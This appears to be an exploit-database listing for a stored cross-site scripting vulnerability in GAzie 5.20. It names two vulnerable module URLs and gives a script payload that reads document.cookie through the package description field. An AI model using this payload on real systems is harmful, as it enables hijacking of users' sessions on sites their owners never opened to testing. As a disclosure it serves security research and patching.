[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GAzie <= 5.20 Cross Site Scripting Vulnerability

Author
R3ZN0V
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19716
Category
web applications
Date add
12-11-2012
Platform
php
# Exploit Title: [Stored Cross Site Scripting]
# Risk : Very High
# Date: [2/6/2012]
# Author: [R3ZN0V]
# Email : reznov--@hotmail.com
# Software Link: http://sourceforge.net/projects/gazie/files/gazie/gazie5.20/gazie5.20.zip/download
# Version: [5.20]

[*] The Exploit [*]

" http://localhost/[script]/modules/config/report_aliiva.php?field=2&auxil=1&flag_order=&limit=0 [Xss Code]
" http://localhost/[script]/modules/config/report_imball.php "

[*] Descriptions for the Vulnerability [*]

In this link you can add a new package 'Insert new package type' ,, in the description field put your code 'just 50 characters '
then click insert ,, and try insert this code :

<script>alert(document.cookie)</script>

Go to the database exactly where the (gaz_001imball) excist in your database and browse the distinct value for the (descri)
and see the result .

Greatz To : Allah.

#  0day.today [2024-11-15]  #